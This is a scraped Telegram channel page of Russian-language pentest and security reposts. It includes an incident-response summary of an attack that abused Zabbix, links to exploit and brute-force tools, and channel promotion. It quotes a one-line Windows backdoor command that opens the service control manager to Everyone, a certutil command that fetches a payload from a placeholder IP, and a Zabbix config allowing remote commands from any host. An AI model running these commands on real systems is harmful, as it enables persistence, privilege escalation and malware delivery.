uk
Feedback
Fsecurity | HH

Fsecurity | HH

Відкрити в Telegram

👾 Канал про КБ и пентест Наш Discord: https://discord.gg/Eg8aDS7Hn7 ✉️ По сотрудничеству: @OxHaskar 🍩 Поддержать: https://www.donationalerts.com/r/xackapb

Показати більше
2 063
Підписники
-124 години
-57 днів
-730 днів
Архів дописів
Repost from 1N73LL1G3NC3
Almost invisible, persistent, fileless, LPE backdoor from an elevated command prompt: sc.exe sdset scmanager D:(A;;KA;;;WD) B
Almost invisible, persistent, fileless, LPE backdoor from an elevated command prompt:
sc.exe sdset scmanager D:(A;;KA;;;WD)
By Gregorz Tworek

Repost from purple shift
Среди интересных инцидентов прошлого года – выявлен очень незаметный способ закрепиться и латерально перемещаться. Небольшое количество изменений в системе, вне поверхности обычного абузного легитимного win-based и под покрывалом обычного софта. Атакующие приносят нагрузки:
certutil.exe -urlcache -split -f hxxp://<Public IP>/<file with payload>
Используют возможности популярной системы мониторинга Zabbix с конфигурацией, разрешающей удалённое выполнение команд:
EnableRemoteCommands=1
LogFile=0
Server=0.0.0.0/0
ListenPort=5432
Для Zabbix-агентов на фаерволе злоумышленники открывают порт 5432 с красивым и правильным именем PGSQL. В результате использования этих техник атакующие, очень похожие на группировку Flax Typhoon, более двух лет остаются незамеченными в системе – пока не приходят эксперты по реагированию на инциденты. Подробнее об этой атаке, а также о других интересных инцидентах, расследованных нашими коллегами в прошлом году: https://securelist.com/incident-response-interesting-cases-2023/113611/

Появилась запись нашего с Сергеем доклада про выгорание 😊

sticker.webp0.29 KB

Был обновлен Obsidian Pentest 👾 1. Коммит 2. Коммит Приятного чтения 📖 Наш Discord сервер 👆🏻Тут можно пообщаться 🦈

Repost from AP Security
#realcase CVE-2023-29360: госсекреты США на волоске от масштабной компрометации Такие заголовки новостей появлялись не так давно, в начале марта нынешнего года. Как раз с подробным исследовательским отчётом по данной уязвимости можно ознакомиться по следующей ссылке. Сам же PoC можно найти на GitHub

Repost from AP Security
#pentest Kraken - All-in-One Toolkit for BruteForce Attacks Универсальный инструмент для реализации брутфорса разных служб и сервисов в одной коробке.

Repost from Proxy Bar
SUDO_KILLER * Скрипт под: Сбор учетных данных Неправильные конфигурации Опасные двоичные файлы (GTFOBINS) Уязвимые версии sudo — CVE Уязвимость Sudo и неправильная конфигурация, связанные с 3dParty Опасные переменные окружающей среды Доступные для записи каталоги, в которых есть скрипты Двоичные файлы, которые можно заменить/переместить * Download + много демо + докер для тестов #sudo

Хочу также посоветовать: 1 - Наш discord сервер! Где можно пообщаться 👾 2 - Мой Github 🦑 Наш второй канал [Ximera-Chan]